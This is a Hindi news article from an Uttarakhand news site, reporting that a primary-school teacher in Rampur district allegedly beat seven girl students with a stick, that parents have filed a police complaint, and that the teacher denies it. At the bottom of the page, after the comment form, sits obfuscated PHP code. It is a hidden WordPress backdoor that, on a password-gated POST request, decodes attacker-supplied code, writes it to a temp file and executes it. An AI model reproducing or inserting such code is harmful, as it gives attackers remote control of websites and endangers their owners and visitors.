Crime: स्कूल में अकेले था शिक्षक, सात छात्राओं को दौड़ाकर डंडे से पीटा, छात्राएं घायल, अभिभावकों का हंगामा

Uttarakhand Press 9 October 2023: Rampur News रामपुर जिले के बगरौआ गांव के प्राथमिक विद्यालय के शिक्षक ने नियम-कानून को तार-तार कर दिया। शनिवार को विद्यालय परिसर में बैठीं छात्राओं को डंडा लेकर दौड़ा लिया। आरोप है कि सात छात्राओं को बेरहमी से पीट दिया। वह घायल हो गईं। उस वक्त स्कूल में शिक्षक अकेले ही थे। घटना के विरोध में अभिभावकों ने भी स्कूल में जाकर हंगामा किया।

बगरौआ गांव के प्राथमिक विद्यालय के शिक्षक ने नियम-कानून को तार-तार कर दिया। शनिवार को विद्यालय परिसर में बैठीं छात्राओं को डंडा लेकर दौड़ा लिया। आरोप है कि सात छात्राओं को बेरहमी से पीट दिया। वह घायल हो गईं। उस वक्त स्कूल में शिक्षक अकेले ही थे।

घटना के विरोध में अभिभावकों ने भी स्कूल में जाकर हंगामा किया। ग्रामीणों ने दोनों पक्षों में समझौता कराने का प्रयास किया। रविवार को अजीमनगर थाने में तहरीर दी गई है। शनिवार को प्रधानाध्यापक, एक महिला शिक्षक और शिक्षा मित्र अवकाश पर थे। सिर्फ शिक्षक सचिन कुमार ही डयूटी पर थे।

सात छात्राएं घायल:
आरोप है कि छात्राएं दोपहर के समय स्कूल परिसर में बैठी थीं, इसी बीच शिक्षक सचिन डंडा लेकर आ गए। उन्होंने पहले छात्राओं को डांट दिया। फिर डंडे से पिटाई करनी शुरू कर दी। सात छात्राएं घायल हो गई। शोरशराबा होने पर आसपास के लोग भी एकत्र हो गए। उन्होंने छात्राओं को उनके घरों तक पहुंचाया।

घटना को लेकर अभिभावकों में भी आक्रोश फैल गया। बताया जाता है कि गांव के कुछ लोगों ने समझौते के प्रयास शुरू कर दिए। लेकिन, अभिभावक शिक्षक के खिलाफ कार्रवाई की मांग पर अड़े रहे। रविवार को अभिभावक नफीस की ओर से तहरीर दी गई है।

आरोपों की होगी जांच:
प्रभारी निरीक्षक बिजेंद्र सिंह के मुताबिक तहरीर मिली हैं। जांच की जा रही है। सोमवार को गांव जाकर भी अभिभावकों से बात करेंगे। इधर, आरोपित शिक्षक सचिन कुमार ने आरोप को निराधार बताया है। उनका कहना है कि स्कूल के छात्र-छात्राओं को अपने बच्चों की तरह समझते हैं। शनिवार को स्कूल में वह अकेले थे, करीब सौ छात्र व छात्राएं थे। वह अपनी कक्षाओं से निकलकर इधर-उधर घूम रहे थे। उन्होंने छात्रों को डांट डपट दिया था। पीटने की स्थिति नहीं है।

Read Previous

Uttarakhand: केंद्र सरकार ने जोशीमठ के लिए 1845 करोड़ की दी मंजूरी, उपचार व पुनर्वास को जल्द जारी होगी 1464 करोड़ की राशि

Read Next

Rudrapur: यू-ट्यूब वीडियो देखकर रुपये कमाने का झांसा देकर 3.85 लाख ठगे, पुलिस ने दर्ज किया मुकदमा

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}